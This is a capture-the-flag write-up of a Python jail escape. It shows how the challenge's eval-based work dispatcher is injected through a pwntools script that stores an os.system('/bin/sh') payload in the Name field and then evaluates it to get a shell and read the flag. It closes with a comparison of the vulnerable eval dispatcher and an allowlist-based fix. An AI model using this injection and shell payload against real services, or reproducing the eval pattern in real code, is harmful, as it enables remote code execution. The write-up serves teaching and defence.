Tags: misc python 

```
__
PyJail /__\
____________| |
|_|_|_|_|_|_| |
|_|_|_|_|_|_|__|
A@\|_|_|_|_|_|/@@Aa
aaA@@@@@@@@@@@@@@@@@@@aaaA
A@@@@@@@@@@@@@@@@@@@@@@@@@@A
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[!] Rule
1. After 3 day, the Light will be Turned Off then you Cannot see anything.
2. Cannot Use Some Special Characters in PyJail.
3. For 10 days, You can enter 38 characters per day.

Can You Escape from Here ??

Name: whatever
[day-1]
################## Work List ##################
coworker : Find Coworker For Escape
tool : Find Any Tool
dig : Go Deep~
bomb : make boooooooomb!!!
###############################################
digg
Traceback (most recent call last):
File "/home/impel_down/Impel_Down.py", line 140, in <module>
result = eval("your."+work+"()")
File "<string>", line 1, in <module>
AttributeError: Esacpe_Player instance has no attribute 'digg'
```

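Our Approach

The traceback shows that our input is concatenated into the evaluated string, `eval("your."+work+"()")`. Whatever we enter as the work item lands between `"your."` and `"()"`, so we can send more than a single method name (the bold part is our input):

result = eval("your."**dig(),[some trick],exit**"()")

We also assume that Name was saved into a variable called "**name**".

We can put any Python payload into **Name** and then eval the **name** variable inside **result**.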

```
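from pwn import *

# Connect to the challenge service
a = remote("ch41l3ng3s.codegate.kr", 2014)
print(a.recvuntil("Name :"))
# The Name field carries the payload
a.sendline('__import__("os").system("/bin/sh")')
print(a.recvuntil("###############################################"))
# Work item: a valid call, then eval of the stored name; the trailing exit absorbs the appended "()"
a.sendline("dig(),eval(name),exit")
a.interactive()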
```

Then we found a file whose name starts with FLAG in `/`:
```
$ file /FLAG*
FLAG_FLAG_FLAG_LOLOLOLOLOLOL: executable, regular file, no read permission
$ /FLAG*
G00000000d !! :)
I think you are familiar with Python !
FLAG{Pyth0n J@il escape 1s always fun @nd exc1ting ! :)}
```
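
The dispatch line from the traceback next to an allowlist-based replacement, as an added example that is not the challenge's source code. The `Player` class body, the `log` list, and the harmless `name` value are assumptions constructed for the demonstration; only the `eval` expression, the four work items, and the work string come from the write-up.

```python
class Player:                      # stand-in for the challenge's Esacpe_Player
    def coworker(self): return "coworker"
    def tool(self): return "tool"
    def dig(self): return "dig"
    def bomb(self): return "bomb"

ALLOWED = frozenset({"coworker", "tool", "dig", "bomb"})  # the Work List entries

def dispatch_vulnerable(your, work, name, log):
    # Same shape as line 140 in the traceback: input becomes source text.
    # `name` and `log` are locals, so the evaluated expression can reach them.
    return eval("your." + work + "()")

def dispatch_hardened(your, work):
    # Input is only ever a lookup key; nothing typed by the user is parsed.
    if work not in ALLOWED:
        raise ValueError("unknown work item: %r" % (work,))
    return getattr(your, work)()

def demo():
    player, log = Player(), []
    work = "dig(),eval(name),exit"      # work string used in the write-up
    name = "log.append('name ran')"     # constructed, harmless stand-in for Name
    try:
        dispatch_vulnerable(player, work, name, log)
    except (SystemExit, NameError):     # the trailing exit() ends the expression
        pass
    try:
        dispatch_hardened(player, work)
        rejected = False
    except ValueError:
        rejected = True
    return log, rejected, dispatch_hardened(player, "dig")

if __name__ == "__main__":
    print(demo())
```

The vulnerable dispatcher runs the contents of `name` before `exit()` is reached, while the hardened one rejects the same string and still serves the legitimate `dig` item.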